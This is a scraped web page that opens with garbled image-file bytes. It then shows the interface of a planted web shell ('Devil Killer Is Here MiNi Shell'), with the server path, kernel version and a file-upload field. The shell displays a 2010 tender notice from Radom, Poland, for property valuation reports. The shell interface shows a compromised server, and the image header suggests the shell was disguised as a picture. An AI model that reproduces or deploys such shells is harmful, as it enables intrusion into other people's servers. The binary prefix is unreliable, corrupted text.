JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/251901-N-2010.html

<p class="kh_header"><b>Radom: wykonanie operatów szacunkowych nieruchomości położonych w Radomiu</b><br>
<b>Numer ogłoszenia: 251901 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa reprezentowany przez Prezydenta Miasta Radomia , ul. Jana Kilińskiego 30, 26-600 Radom, woj. mazowieckie, tel. 0-48 36 20 283, 36 20 284, faks 0-48 36 20 282.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie operatów szacunkowych nieruchomości położonych w Radomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Część pierwsza zamówienia:
Wykonanie operatów szacunkowych w celu ustalenia wartości rynkowej nieruchomości, stanowiących własność Skarbu Państwa położonych w Radomiu, w związku ze sprzedażą jej w trybie bezprzetargowym na rzecz użytkowników wieczystych, , oraz potwierdzenie jej aktualności po upływie 12 miesięcy od daty sporządzenia w terminie 30 dni od daty wystąpienia z wnioskiem:
1. ul. Marjańskiego  - działka nr: 39/1 o pow. 11539 m2 (Obr. XII, ark 124) zapisanej w KW Nr RA1R/00069638/6 w użytkowaniu wieczystym osoby prawnej
2. ul. Orzechowej - działki nr: 313/17, 313/18, 313/22 o łącznej powierzchni 3077 m2 (Obr. XII, ark 123) zapisanej w KW Nr RA1R/00088142/1 w użytkowaniu wieczystym osób fizycznych  
3. ul. Rodziny Ziętalów - działka nr: 147/21 o pow. 9605 m2 (Obr. II, ark 6) zapisana w KW Nr RA1R/00114195/9 w użytkowaniu wieczystym osób fizycznych.

Część druga zamówienia:
Wykonanie operatów szacunkowych nieruchomości dotyczących określenia wartości rynkowej nieruchomości stanowiących Własność Skarbu Państwa, położonych w Radomiu,  oraz potwierdzenia ich aktualności po upływie 12 miesięcy od daty sporządzenia, w terminie 30 dni od daty wystąpienia 
z wnioskiem. Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z późn. zm.)
1. ul. Tartacznej, dz. nr 1/3 o pow. 199m2, (obręb VIII,   arkusz 101), KW Nr RA1R/00083213/5- nieruchomość w użytkowaniu wieczystym osoby prawnej.
2. ul. Ks. Łukasika, dz. nr 2/5 o pow. 15490 m2, dz. nr 2/6 o pow. 4661m2  (Obr. VIII, ark. 98), KW Nr RA1R/00068226/8 - nieruchomość w użytkowaniu wieczystym osoby prawnej.
3. ul. Toruńskiej, dz. nr 148 o pow. 30791m2 (Obr. VIII, ark. 105), KW Nr RA1R/00076594/7- nieruchomość w użytkowaniu wieczystym osoby prawnej.
4. ul. Gdyńskiej, dz. nr 80 o pow. 1155m2, dz. nr 81 o pow. 1060m2,  dz. nr 82  o pow. 1049m2 (Obr. VIII, ark. 99), KW Nr RA1R/00055641/9 - nieruchomość  w użytkowaniu wieczystym osoby prawnej.
5. ul. 1905 Roku, dz. nr 65/4 o pow. 488m2,  dz. nr 65/6 o pow. 580m2 (Obr. VIII, ark. 99), KW Nr RA1R/00018920/8 , nieruchomość w użytkowaniu wieczystym osoby fizycznej.
6. ul. 1905 Roku, dz. nr 67/12 o pow. 1337m2 (Obr. VIII, ark. 99), KW Nr RA1R/00108215/1, nieruchomość w użytkowaniu wieczystym osoby prawnej.
7. ul. Marywilskiej, dz. nr 67/41 o pow. 933m2 (Obr. VIII, ark. 99), KW Nr RA1R/00120553/2, nieruchomość w użytkowaniu wieczystym osoby fizycznej.
8. ul. 1905 Roku, dz. nr 67/18 o pow. 2429m2 (Obr. VIII, ark. 99), KW Nr RA1R/00110490/9, nieruchomość w użytkowaniu wieczystym osoby fizycznej.
9. ul. Marywilskiej, dz. nr 67/24 o pow. 1207m2 (Obr. VIII, ark. 99), KW Nr RA1R/00112921/4, nieruchomość w użytkowaniu wieczystym osoby prawnej.
10. ul. Marywilskiej, dz. nr 67/25 o pow. 1897m2 (Obr. VIII, ark. 99), KW Nr RA1R/00112997/7, nieruchomość w użytkowaniu wieczystym osoby prawne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, dla części drugiej zamówienia, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, nie przekraczających 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania w/w warunku zamawiający dokona metodą SPEŁNIA - NIE SPEŁNIA na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych wymienionego w pkt III.4.1) - na druku, którego wzór został dołączony do materiałów przetargowych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania w/w warunku zamawiający dokona metodą SPEŁNIA - NIE SPEŁNIA na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych wymienionego w pkt III.4.1) - na druku, którego wzór został dołączony do materiałów przetargowych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania w/w warunku zamawiający dokona metodą SPEŁNIA - NIE SPEŁNIA na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych wymienionego w pkt III.4.1) - na druku, którego wzór został dołączony do materiałów przetargowych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie przez Wykonawcę, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają aktualne uprawnienia zawodowe w zakresie szacowania nieruchomości, zgodnie z obowiązującymi przepisami ustawy z dn. 21 sierpnia 1997r. o gospodarce nieruchomościami (tj.: Dz. U. z 2010r. Nr 102, poz. 651 z późn. zm.)
Oceny spełniania w/w warunku zamawiający dokona metodą SPEŁNIA - NIE SPEŁNIA na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych wymienionego w pkt III.4.1) - na druku, którego wzór został dołączony do materiałów przetargowych oraz dokumentów wymienionych w pkt III.4.1.1. i III.4.1.2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie tego warunku wykazanie przez Wykonawcę, że jest on ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności odpowiadającej przedmiotowi zamówienia.
Oceny spełniania w/w warunku zamawiający dokona metodą SPEŁNIA - NIE SPEŁNIA na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu na podstawie art. 22 ust. 1 ustawy Prawo zamówień publicznych wymienionego w pkt III.4.1) - na druku, którego wzór został dołączony do materiałów przetargowych oraz dokumentu wymienionego w pkt III.4.1.3.
Z treści załączonych oświadczeń i dokumentów musi wynikać jednoznacznie, iż wykonawca spełnia w/w warunki. Wystarczającym powodem do wykluczenia wykonawcy może być brak w ofercie wymaganych oświadczeń lub dokumentów lub ich nie uzupełnienie we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy wykonawca składa ofertę przez ustanowionego pełnomocnika;
W przypadku podmiotów występujących wspólnie (powołanie konsorcjum) pełnomocnictwo, 
o którym mowa w art. 23 ust. 2 ustawy Prawo zamówień publicznych.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Kopie dokumentów załączonych do oferty dotyczących tych podmiotów są poświadczane za zgodność z oryginałem przez te podmioty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wcześniejsze wykonanie zamówienia przez Wykonawcę pod warunkiem zrealizowania wszystkich wymogów określonych w SIWZ.
W przypadku wystąpienia sytuacji takich jak: siła wyższa lub konieczność uzyskania dodatkowych pozwoleń bądź decyzji związanych z czynnościami i zadaniami wykonywanymi przez Urząd Miejski w Radomiu, które uniemożliwią Wykonawcy realizację prac objętych warunkami umowy, dopuszcza się możliwość zmiany w/w umowy w kwestii przedłużenia terminu wykonania prac</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Miasta Radomia - Urząd Miejski w Radomiu Biuro Zamówień Publicznych ul. Jana Kilińskiego 30 (wejście od ul. Żeromskiego 53, pokój nr 1, 2, 3 - parter) 26-610 Radom, w godzinach pracy Urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2010 godzina 10:30, miejsce: Gmina Miasta Radomia - Urząd Miejski w Radomiu Biuro Zamówień Publicznych, ul. Jana Kilińskiego 30, pok. nr 1, 2, 3 (wejście od ul. Żeromskiego 53, parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie nie jest finansowane ze środków UE.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie operatów szacunkowych w celu ustalenia wartości rynkowej nieruchomości, stanowiących własność Skarbu Państwa położonych w Radomiu, w związku ze sprzedażą jej w trybie bezprzetargowym na rzecz użytkowników wieczystych, oraz potwierdzenie jej aktualności po upływie 12 miesięcy od daty sporządzenia w terminie 30 dni od daty wystąpienia z wnioskiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. ul. Marjańskiego  - działka nr: 39/1 o pow. 11539 m2 (Obr. XII, ark 124) zapisanej w KW Nr RA1R/00069638/6 w użytkowaniu wieczystym osoby prawnej
2. ul. Orzechowej - działki nr: 313/17, 313/18, 313/22 o łącznej powierzchni 3077 m2 (Obr. XII, ark 123) zapisanej w KW Nr RA1R/00088142/1 w użytkowaniu wieczystym osób fizycznych  
3. ul. Rodziny Ziętalów - działka nr: 147/21 o pow. 9605 m2 (Obr. II, ark 6) zapisana w KW Nr RA1R/00114195/9 w użytkowaniu wieczystym osób fizycznych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.30.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 05.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie operatów szacunkowych nieruchomości dotyczących określenia wartości rynkowej nieruchomości stanowiących Własność Skarbu Państwa, położonych w Radomiu,  oraz potwierdzenia ich aktualności po upływie 12 miesięcy od daty sporządzenia, w terminie 30 dni od daty wystąpienia z wnioskiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.ul. Tartacznej, dz. nr 1/3 o pow. 199m2, (obręb VIII,   arkusz 101), KW Nr RA1R/00083213/5- nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
2. ul. Ks. Łukasika, dz. nr 2/5 o pow. 15490 m2, dz. nr 2/6 o pow. 4661m2  (Obr. VIII, ark. 98), KW Nr RA1R/00068226/8 - nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntów w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
3. ul. Toruńskiej, dz. nr 148 o pow. 30791m2 (Obr. VIII, ark. 105), KW Nr RA1R/00076594/7- nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
4. ul. Gdyńskiej, dz. nr 80 o pow. 1155m2, dz. nr 81 o pow. 1060m2,  dz. nr 82  o pow. 1049m2 (Obr. VIII, ark. 99), KW Nr RA1R/00055641/9 - nieruchomość  w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
5. ul. 1905 Roku, dz. nr 65/4 o pow. 488m2,  dz. nr 65/6 o pow. 580m2 (Obr. VIII, ark. 99), KW Nr RA1R/00018920/8 , nieruchomość w użytkowaniu wieczystym osoby fizycznej.
Celem wyceny jest określenie wartości rynkowej gruntów w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
6. ul. 1905 Roku, dz. nr 67/12 o pow. 1337m2 (Obr. VIII, ark. 99), KW Nr RA1R/00108215/1, nieruchomość w użytkowaniu wieczystym osoby prawnej.
Celem wyceny jest określenie wartości rynkowej gruntu w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego, z uwzględnieniem art. 77 ust. 4, 5, 6 ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2010r. Nr 102, poz. 651 z póżn. zm.)
7. ul. Marywilskiej, dz. nr 67/41 o pow. 933m2 (Obr. VIII, ark. 99), KW Nr RA1R/00120553/2, nieruchomość w użytkowaniu wieczystym osoby fizycznej.
